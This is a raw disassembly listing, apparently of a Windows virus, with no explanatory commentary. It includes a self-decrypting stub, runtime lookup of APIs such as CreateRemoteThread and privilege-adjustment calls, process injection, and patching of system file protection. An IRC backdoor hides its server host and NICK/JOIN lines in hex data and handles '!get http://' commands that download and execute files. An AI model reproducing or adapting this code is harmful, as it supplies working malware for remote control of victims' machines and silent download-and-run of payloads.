dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 7030501h, 2A40602h
dd 0ACB1447Eh, 145A49E8h, 0FF8B8B00h, 0E860C089h, 0Dh
dd 0CEE8F9h, 0EB0000h, 3CE9h, 0FF646700h, 89000036h, 42705525h
dd 89DB8700h, 9000EBC0h, 26896467h, 0DB310000h, 68h, 685380h
dd 53000100h, 80068h, 2685300h, 53000000h, 0FF535353h
dd 427F7015h, 0BCD28900h, 2A8CEB46h, 0F5DB87FCh, 58F64h
dd 5B000000h, 0FEC029F9h, 74C008C8h, 0EBF87504h, 0E8F5F867h
dd 5Ch, 81FC9090h, 0FFD079EAh, 0B6BF52FFh, 8900002Ah, 0E383FCD2h
dd 96C38100h, 87000000h, 26E8DBh, 0F5F80000h, 6601C283h
dd 24C381h, 8901EF83h, 75FF09D2h, 0F5FC5AE8h, 5489DB89h
dd 0DB891424h, 0D289F861h, 0F9F5E2FFh, 0DB89028Ah, 3166C089h
dd 0DB87F9D8h, 0DB870286h, 0DB87F9C3h, 0F500EB5Ah, 0F8FCC352h
dd 1024548Bh, 828FC031h, 0ECh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 126h dup(0)
dd 7C800000h, 133Dh dup(0)
db 89h, 0DBh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_43A01F
cld
jmp short $+2
call sub_43A0A6
cmc
mov ebp, 12FFC0h ; DATA XREF: sub_43A01F+C�w
xchg ebx, ebx
jmp loc_43A044
; =============== S U B R O U T I N E =======================================
sub_43A01F proc near ; CODE XREF: .rsrc:0043A005�p
push dword ptr fs:0
mov fs:0, esp
mov dword ptr ds:loc_43A013+1, ebp
mov eax, eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
call ds:dword_427F70 ; GetProcAddress
loc_43A044: ; CODE XREF: .rsrc:0043A01A�j
cmc
mov ecx, ecx
cmc
call sub_43A0A2
stc
add edi, 66h
sub edx, edx
xor edx, 29CCh
stc
jmp short $+2
stc
and esi, 0
add esi, 2Ah
cmc
clc
push edi
loc_43A06C: ; CODE XREF: sub_43A01F+5E�j
call sub_43A092
xchg ebx, ebx
cld
inc edi
inc esi
sub edx, 1
jmp short $+2
or edx, edx
jnz short loc_43A06C
pop edi
cmc
mov esi, [ebp-8]
mov fs:0, esi
stc
nop
leave
stc
mov edx, edx
jmp edi
sub_43A01F endp
; =============== S U B R O U T I N E =======================================
sub_43A092 proc near ; CODE XREF: sub_43A01F:loc_43A06C�p
mov al, [edi]
xchg ebx, ebx
xor ax, si
xchg al, [edi]
stc
mov ebx, ebx
xchg ebx, ebx
retn
sub_43A092 endp
; ---------------------------------------------------------------------------
cmc
; =============== S U B R O U T I N E =======================================
sub_43A0A2 proc near ; CODE XREF: sub_43A01F+29�p
pop edi
cmc
push edi
retn
sub_43A0A2 endp
; =============== S U B R O U T I N E =======================================
sub_43A0A6 proc near ; CODE XREF: .rsrc:0043A00D�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_43A0A6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_43A100
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_43A0F4
mov ebx, [eax+29C1h]
jmp short loc_43A0FE
; ---------------------------------------------------------------------------
loc_43A0F4: ; CODE XREF: .rsrc:0043A0EA�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_43A0FE: ; CODE XREF: .rsrc:0043A0F2�j
mov ebx, [ebx]
loc_43A100: ; CODE XREF: .rsrc:0043A0D2�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 130B7h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_43A12E
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_43A12E: ; CODE XREF: .rsrc:0043A127�j
and ebx, 0FFFFF000h
loc_43A134: ; CODE XREF: .rsrc:0043A143�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_43A145
loc_43A13D: ; CODE XREF: .rsrc:0043A152�j
sub ebx, 100h
jnz short loc_43A134
loc_43A145: ; CODE XREF: .rsrc:0043A13B�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_43A13D
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_43A15F: ; CODE XREF: .rsrc:loc_43A173�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_43A173
cmp dword ptr [eax+5], 6441636Fh
jz short loc_43A178
loc_43A173: ; CODE XREF: .rsrc:0043A168�j
loop loc_43A15F
pop ecx
jmp short loc_43A1A3
; ---------------------------------------------------------------------------
loc_43A178: ; CODE XREF: .rsrc:0043A171�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_43A1EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A231
loc_43A1A3: ; CODE XREF: .rsrc:0043A176�j
; sub_43A231+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_43A1CF
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_43A1CF: ; CODE XREF: sub_43A231-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43A231
; ---------------------------------------------------------------------------
db 0A2h, 0A5h, 53h
; ---------------------------------------------------------------------------
mov ecx, 2889h
mov ebx, edx
loc_43A1DB: ; CODE XREF: .rsrc:0043A1E6�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_43A1DB
pop ebx
retn
; ---------------------------------------------------------------------------
loc_43A1EA: ; CODE XREF: .rsrc:0043A1A1�j
call near ptr loc_43A1F9+2
inc ebx
insb
outsd
jnb short near ptr loc_43A256+3
dec eax
popa
outsb
db 64h
insb
loc_43A1F9: ; CODE XREF: .rsrc:loc_43A1EA�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_43A215+1
inc ebx
jb short loc_43A271
popa
jz short near ptr loc_43A273+1
inc ebp
jbe short near ptr loc_43A273+4
outsb
jz short loc_43A256
loc_43A215: ; CODE XREF: .rsrc:0043A204�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_43A231
inc edi
db 65h
jz short near ptr loc_43A273+1
popa
jnb short near ptr loc_43A29D+2
inc ebp
jb short near ptr loc_43A29D+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_43A231 proc near ; CODE XREF: .rsrc:0043A21F�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A1A3 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0043A5E7 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_43A612
test eax, eax
jz loc_43A1A3
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_43A5E7
loc_43A256: ; CODE XREF: .rsrc:0043A213�j
; .rsrc:0043A1F2�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_43A273
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_43A271: ; CODE XREF: .rsrc:0043A20A�j
jmp short loc_43A27A
; ---------------------------------------------------------------------------
loc_43A273: ; CODE XREF: sub_43A231+2C�j
; .rsrc:0043A20D�j ...
and dword ptr [ebp+101598h], 0
loc_43A27A: ; CODE XREF: sub_43A231:loc_43A271�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_43A29D: ; CODE XREF: .rsrc:0043A229�j
; .rsrc:0043A22C�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_43A64F
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_43A396
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_43A5E7
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_43A5E7
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_43A5E7
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_43A386
jmp loc_43A5E7
; ---------------------------------------------------------------------------
loc_43A386: ; CODE XREF: sub_43A231+14B�p
; sub_43A231+162�j
push 0
pop ecx
jecxz short locret_43A395
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_43A386
; ---------------------------------------------------------------------------
locret_43A395: ; CODE XREF: sub_43A231+158�j
retn
; ---------------------------------------------------------------------------
loc_43A396: ; CODE XREF: sub_43A231+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_43A5E7
call near ptr loc_43A3AD+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_43A3AD: ; CODE XREF: sub_43A231+172�p
add bh, bh
sub_43A231 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_43A64F
cmp dword ptr [ebp+103F2Eh], 0
jz loc_43A5E7
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_43A5E7
mov ecx, [ebp+103F06h]
jecxz short loc_43A436
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_43A436
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_43A436: ; CODE XREF: .rsrc:0043A41A�j
; .rsrc:0043A42B�j
call sub_43A5F3
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_43A47F: ; CODE XREF: .rsrc:0043A488�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_43A47F
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_43A5E7
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h, 54h, 6Ah
dd 0FFFF6A20h, 103F1A95h, 5FC08500h, 4FE83475h, 0E8000001h
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 50E85700h
dd 0FF000005h, 104288B5h, 9E95FF00h, 5700103Eh, 3E6295FFh
dd 6A0010h, 95FF026Ah, 103E92h, 128B9h, 0E12B9700h, 54240C89h
dd 0D695FF57h, 3300103Eh, 72A583F6h, 103Fh, 95FF5754h
dd 103EDAh, 6674C085h, 4FE8346h, 74FFEE72h, 6A0824h, 95FF2A6Ah
dd 103ED2h, 0DC74C085h, 588E893h, 0C9330000h, 393AE391h
dd 103F7285h, 81327500h, 6324247Ch, 74737273h, 0AFC18128h
dd 5000000Eh, 51565054h, 0FF535050h, 103E8A95h, 59C08500h
dd 74FF0F74h, 858F0824h, 103F72h, 0FFFDB5E8h, 95FF53FFh
dd 103E62h, 0C4818EEBh, 128h, 6295FF57h
db 3Eh, 10h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A231
loc_43A5E7: ; CODE XREF: sub_43A231+1F�j
; sub_43A231+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_43A1A3
; END OF FUNCTION CHUNK FOR sub_43A231
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_43A5F3 proc near ; CODE XREF: .rsrc:loc_43A436�p
; sub_43A612+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_43A5F3 endp
; ---------------------------------------------------------------------------
aVx_4_1 db 'Vx_4',0
align 2
; =============== S U B R O U T I N E =======================================
sub_43A612 proc near ; CODE XREF: sub_43A231+9�p
; .rsrc:loc_43B00D�p
xor ecx, ecx
call sub_43A5F3
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_43A612 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 58h
dd 28005858h, 73000033h, 100000Eh, 2 dup(0)
dd 0C0000000h, 29h
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43A64F proc near ; CODE XREF: sub_43A231+7C�p
; .rsrc:0043A3C5�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_43A65A: ; CODE XREF: sub_43A64F+E�j
lodsb
test al, al
jnz short loc_43A65A
loop sub_43A64F
retn
sub_43A64F endp
; ---------------------------------------------------------------------------
dw 958Dh
dd 101985h, 0C695FF52h, 8900103Eh, 10428885h, 16E800h
dd 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 6E95FF50h, 8900103Eh, 10428C85h, 425CC300h
dd 4E657361h, 64656D61h, 656A624Fh, 5C737463h, 65537456h
dd 6C007463h, 6C727473h, 43006E65h, 74616572h, 6C694665h
dd 43004165h, 74616572h, 6C694665h, 70614D65h, 676E6970h
dd 72430041h, 65746165h, 636F7250h, 41737365h, 65724300h
dd 52657461h, 746F6D65h, 72685465h, 646165h, 61657243h
dd 68546574h, 64616572h, 65724300h, 54657461h, 686C6F6Fh
dd 33706C65h, 616E5332h, 6F687370h, 78450074h, 68547469h
dd 64616572h, 6C694600h, 6D695465h, 536F5465h, 65747379h
dd 6D69546Dh, 72460065h, 694C6565h, 72617262h, 65470079h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 74654700h
dd 656C6946h, 657A6953h, 74654700h, 656C6946h, 656D6954h
dd 74654700h, 75646F4Dh, 6148656Ch, 656C646Eh, 65470041h
dd 6D655474h, 6C694670h, 6D614E65h, 47004165h, 65547465h
dd 6150706Dh, 416874h, 56746547h, 69737265h, 47006E6Fh
dd 65567465h, 6F697372h, 4178456Eh, 74654700h, 756C6F56h
dd 6E49656Dh, 6D726F66h, 6F697461h, 4C00416Eh, 4C64616Fh
dd 61726269h, 417972h, 5670614Dh, 4F776569h, 6C694666h
dd 704F0065h, 69466E65h, 614D656Ch, 6E697070h, 4F004167h
dd 506E6570h, 65636F72h, 50007373h, 65636F72h, 32337373h
dd 73726946h, 72500074h, 7365636Fh, 4E323373h, 747865h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 53004173h
dd 69467465h, 6954656Ch, 5300656Dh, 7065656Ch, 73795300h
dd 546D6574h, 54656D69h, 6C69466Fh, 6D695465h, 6E550065h
dd 5670616Dh, 4F776569h, 6C694666h, 69560065h, 61757472h
dd 6C6C416Ch, 5700636Fh, 65746972h, 656C6946h, 41744E00h
dd 73756A64h, 69725074h, 656C6976h, 54736567h, 6E656B6Fh
dd 43744E00h, 74616572h, 6C694665h, 744E0065h, 61657243h
dd 72506574h, 7365636Fh, 744E0073h, 61657243h, 72506574h
dd 7365636Fh, 784573h, 7243744Eh, 65746165h, 74636553h
dd 6E6F69h, 7243744Eh, 65746165h, 72657355h, 636F7250h
dd 737365h, 614D744Eh, 65695670h, 53664F77h, 69746365h
dd 4E006E6Fh, 65704F74h, 6C69466Eh, 744E0065h, 6E65704Fh
dd 636F7250h, 54737365h, 6E656B6Fh, 4F744E00h, 536E6570h
dd 69746365h, 4E006E6Fh, 6F725074h, 74636574h, 74726956h
dd 4D6C6175h, 726F6D65h, 744E0079h, 72657551h, 666E4979h
dd 616D726Fh, 6E6F6974h, 656B6F54h, 744E006Eh, 74697257h
dd 72695665h, 6C617574h, 6F6D654Dh, 52007972h, 6E556C74h
dd 646F6369h, 72745365h, 54676E69h, 736E416Fh, 72745369h
dd 676E69h, 53415357h, 74726174h, 63007075h, 65736F6Ch
dd 6B636F73h, 63007465h, 656E6E6Fh, 67007463h, 6F687465h
dd 79627473h, 656D616Eh, 63657200h, 65730076h, 7300646Eh
dd 656B636Fh, 6E490074h, 6E726574h, 6C437465h, 4865736Fh
dd 6C646E61h, 6E490065h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 65746E49h, 74656E72h
dd 6E65704Fh, 6E490041h, 6E726574h, 704F7465h, 72556E65h
dd 4900416Ch, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 41564441h, 32334950h, 4C4C442Eh, 67655200h, 736F6C43h
dd 79654B65h, 67655200h, 6E65704Fh, 4579654Bh, 52004178h
dd 75516765h, 56797265h, 65756C61h, 417845h, 53676552h
dd 61567465h, 4565756Ch, 56004178h, 26AF633h, 0D48B5656h
dd 0FF52016Ah, 0FF561872h, 10428C95h, 56C48B00h, 56505656h
dd 0FF1870FFh, 103EFA95h, 10C48300h, 8C25Eh, 2BFB498Dh
dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h
dd 8B50CC8Bh, 6A5450D4h, 53525140h, 3F2295FFh, 0C4830010h
dd 2A95FF0Ch, 8300103Fh, 8DC308C4h, 103E3095h, 6AC93300h
dd 30685200h, 8B003200h, 6A5151C4h, 6A515040h, 8C08318h
dd 500E6A54h, 3F1E95FFh, 0C4830010h, 85D23320h, 0C2990FC0h
dd 2358DAF7h, 3357C3C2h, 0FFC1E8FFh, 840FFFFFh, 0A5h, 73286850h
dd 0D48B0000h, 0CC8B006Ah, 68406Ah, 6A001000h, 6A5202h
dd 732868h, 51006A00h, 95FF5053h, 103F12h, 95FF595Fh, 103E62h
dd 7174FF85h, 15908D8Bh, 0CE30010h, 1000958Dh, 0D1030010h
dd 0D2FF5357h, 3EFE858Bh, 8F8D0010h, 2916h, 0FFFF2BE8h
dd 16858BFFh, 8D00103Fh, 29638Fh, 0FF1AE800h, 858BFFFFh
dd 103F02h, 296A8F8Dh, 9E80000h, 8BFFFFFFh, 103F0685h
dd 74C08500h, 778F8D20h, 0E8000029h, 0FFFFFEF4h, 3F0E858Bh
dd 0C0850010h, 8F8D0B74h, 2984h, 0FFFEDFE8h, 5FC78BFFh
dd 0E855C3h, 5D000000h, 1B24ED81h, 0C9330010h, 1EAF858Dh
dd 54510010h, 51505151h, 8E95FF51h, 8700103Eh, 95FF2404h
dd 103E62h, 4C25Dh, 0E855h, 815D0000h, 101B53EDh, 8DFF6A00h
dd 101B1E95h, 0CD525000h, 2A002420h, 0CC48300h, 6485C766h
dd 0CD00101Bh, 6685C720h, 2400101Bh, 5D002A00h, 581A6AC3h
dd 9E8h, 61428D00h, 75C9FEAAh, 9569C3F0h, 103F7Ch, 8088405h
dd 7C958942h, 0F700103Fh, 0E855C3E2h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101BADh
mov ebx, [ebp+103F80h]
cmp dword ptr [esp+8], 0
jz loc_43AD31
sub esp, 208h
push esp
push 104h
call dword ptr [ebp+103EB6h]
mov edi, esp
lea eax, [esp+104h]
push eax
push 0
call near ptr loc_43AC9E+1
push esi
push edx
push edx
loc_43AC9E: ; CODE XREF: .rsrc:0043AC96�p
add [edi-1], dl
xchg eax, ebp
mov dl, 3Eh
adc [eax], al
xor ecx, ecx
lea edx, [edi+104h]
push ecx
push ecx
push 2
push ecx
push 1
push 40000000h
push edx
call dword ptr [ebp+103E7Eh]
xchg eax, esi
test esi, esi
jz short loc_43AD21
loc_43ACC6: ; CODE XREF: .rsrc:0043ACF4�j
push eax
push esp
push 104h
push edi
push dword ptr [esp+220h]
call dword ptr [ebp+103F5Eh]
pop ecx
test eax, eax
jz short loc_43ACF6
jecxz short loc_43ACF6
push eax
mov edx, esp
push 0
push edx
push ecx
push edi
push esi
call dword ptr [ebp+103EF6h]
pop ecx
test eax, eax
jnz short loc_43ACC6
loc_43ACF6: ; CODE XREF: .rsrc:0043ACDE�j
; .rsrc:0043ACE0�j
push esi
call dword ptr [ebp+103E62h]
lea edx, [edi+44h]
push edx
push edi
push 44h
pop eax
lea edx, [edi+104h]
stosd
xor eax, eax
push 10h
pop ecx
rep stosd
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push edx
call dword ptr [ebp+103E86h]
loc_43AD21: ; CODE XREF: .rsrc:0043ACC4�j
add esp, 208h
push dword ptr [esp+8]
call dword ptr [ebp+103F4Eh]
loc_43AD31: ; CODE XREF: .rsrc:0043AC72�j
push ebx
call dword ptr [ebp+103F4Eh]
pop ebp
retn 4
; ---------------------------------------------------------------------------
cmp byte ptr [esi], 0Ah
jnz short loc_43AD42
inc esi
loc_43AD42: ; CODE XREF: .rsrc:0043AD3F�j
mov ecx, [ebp+10158Ch]
jecxz short loc_43AD63
lea edx, [ebp+101000h]
add edx, ecx
push esi
call edx
test al, al
js loc_43AE7C
jz loc_43AE73
loc_43AD63: ; CODE XREF: .rsrc:0043AD48�j
cmp byte ptr [esi], 3Ah
jnz short loc_43AD78
loc_43AD68: ; CODE XREF: .rsrc:0043AD75�j
inc esi
cmp byte ptr [esi], 0
jz loc_43AE73
cmp byte ptr [esi], 20h
jnz short loc_43AD68
inc esi
loc_43AD78: ; CODE XREF: .rsrc:0043AD66�j
cmp dword ptr [esi], 474E4950h
jnz short loc_43ADC2
mov ecx, edi
mov byte ptr [esi+1], 4Fh
sub ecx, esi
push ecx
push 0
push ecx
push esi
push ebx
call dword ptr [ebp+103F46h]
pop ecx
cmp eax, ecx
jnz loc_43AE7C
lea eax, [ebp+101EA3h]
push 0
push 0Ch
push eax
push ebx
call dword ptr [ebp+103F46h]
cmp eax, 0Ch
jnz loc_43AE7C
jmp loc_43AE73
; ---------------------------------------------------------------------------
loc_43ADC2: ; CODE XREF: .rsrc:0043AD7E�j
cmp dword ptr [esi], 56495250h
jnz loc_43AE73
add esi, 8
loc_43ADD1: ; CODE XREF: .rsrc:0043ADDC�j
lodsb
cmp al, 0Dh
jz loc_43AE73
cmp al, 20h
jnz short loc_43ADD1
lodsb
cmp al, 3Ah
jnz loc_43AE73
lodsd
or eax, 20202020h
cmp eax, 74656721h
jnz short loc_43AE73
lodsb
cmp al, 20h
jnz short loc_43AE75
cmp dword ptr [esi-1], 74746820h
jnz short loc_43AE73
cmp dword ptr [esi+3], 2F2F3A70h
jnz short loc_43AE73
mov byte ptr [edi-1], 0
rdtsc
mov edx, 2710h
mul edx
push edx
call dword ptr [ebp+103EE6h]
xor eax, eax
push eax
push eax
push eax
push eax
call near ptr loc_43AE31+2
inc esp
outsd
ja short loc_43AE9C
insb
outsd
popa
loc_43AE31: ; CODE XREF: .rsrc:0043AE25�p
db 64h
add bh, bh
xchg eax, ebp
push esi
aas
adc [eax], al
test eax, eax
jz short loc_43AE73
xor ecx, ecx
mov [ebp+103F80h], eax
push ecx
push 80000200h
push ecx
push ecx
push esi
push eax
call dword ptr [ebp+103F5Ah]
lea edx, [ebp+101BA7h]
push eax
xor ecx, ecx
push esp
push ecx
push eax
push edx
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
loc_43AE73: ; CODE XREF: .rsrc:0043AD5D�j
; .rsrc:0043AD6C�j ...
clc
retn
; ---------------------------------------------------------------------------
loc_43AE75: ; CODE XREF: .rsrc:0043ADF7�j
or byte ptr [ebp+10157Fh], 1
loc_43AE7C: ; CODE XREF: .rsrc:0043AD57�j
; .rsrc:0043AD97�j ...
stc
retn
; ---------------------------------------------------------------------------
push 1
push 1
push dword ptr [ebx]
push dword ptr [ebx+4]
call dword ptr ds:5A74C085h ; CODE XREF: .rsrc:0043AFED�p
xor ebx, ebx
mov edx, eax
mov bl, 0Bh
add edx, [eax+3Ch]
lea esi, [ebp+101DCBh]
loc_43AE9C: ; CODE XREF: .rsrc:0043AE2C�j
mov edi, [edx+10Ch]
mov ecx, [edx+108h]
add edi, eax
sub ecx, ebx
loc_43AEAC: ; CODE XREF: .rsrc:0043AEB5�j
pusha
mov ecx, ebx
repe cmpsb
popa
jz short loc_43AEB9
inc edi
loop loc_43AEAC
jmp short locret_43AEE7
; ---------------------------------------------------------------------------
loc_43AEB9: ; CODE XREF: .rsrc:0043AEB2�j
add edi, 0Fh
push ebx
mov ecx, esp
push edi
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push 0FFFFFFFFh
call dword ptr [ebp+103F22h]
mov ecx, [ebp+103E96h]
add esp, 0Ch
sub ecx, edi
sub ecx, 7
mov dword ptr [edi], 0E8006Ah
mov [edi+3], ecx
locret_43AEE7: ; CODE XREF: .rsrc:0043AEB7�j
retn
; ---------------------------------------------------------------------------
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
dd 5000h, 72700000h, 6D69786Fh, 6372692Eh, 616C6167h, 702E7978h
dd 494E006Ch, 66204B43h, 646A646Eh, 0A617A77h, 52455355h
dd 4F4A6520h, 26204E49h, 74726976h, 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101EB5h
mov byte ptr [ebp+10157Fh], 0
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz short loc_43AFBD
push 1Eh
mov esi, [ebp+103E72h]
pop ecx
loc_43AF8A: ; CODE XREF: .rsrc:loc_43AFB9�j
lodsb
cmp al, 2Eh
jnz short loc_43AFB9
cmp word ptr [esi], 1DFFh
jnz short loc_43AFB9
lea edi, [ebp+103F76h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+1038ECh]
pop dword ptr [ebp+103912h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_43AFB9: ; CODE XREF: .rsrc:0043AF8D�j
; .rsrc:0043AF94�j
loop loc_43AF8A
jmp short loc_43B00D
; ---------------------------------------------------------------------------
loc_43AFBD: ; CODE XREF: .rsrc:0043AF7F�j
call near ptr dword_43A664+47Fh
cmp dword ptr [esp+8], 4
jnz short loc_43B00D
call near ptr loc_43AFD5+1
push ebx
inc esi
inc ebx
db 2Eh
inc esp
dec esp
dec esp
loc_43AFD5: ; CODE XREF: .rsrc:0043AFC9�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add [ebx], cl
sal byte ptr [ebp+ecx-6Dh], 6Ah
add dl, [ebx-1]
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
call eax
xchg eax, ebx
call near ptr loc_43AE87+2
call near ptr loc_43B001+1
push ebx
inc esi
inc ebx
pop edi
dec edi
push ebx
db 2Eh
inc esp
dec esp
dec esp
loc_43B001: ; CODE XREF: .rsrc:0043AFF2�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
loc_43B009: ; CODE XREF: .rsrc:loc_43B009�j
jl short loc_43B009
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
; ---------------------------------------------------------------------------
loc_43B00D: ; CODE XREF: .rsrc:0043AFBB�j
; .rsrc:0043AFC7�j
call sub_43A612
dec dword ptr [ebp+1012D4h]
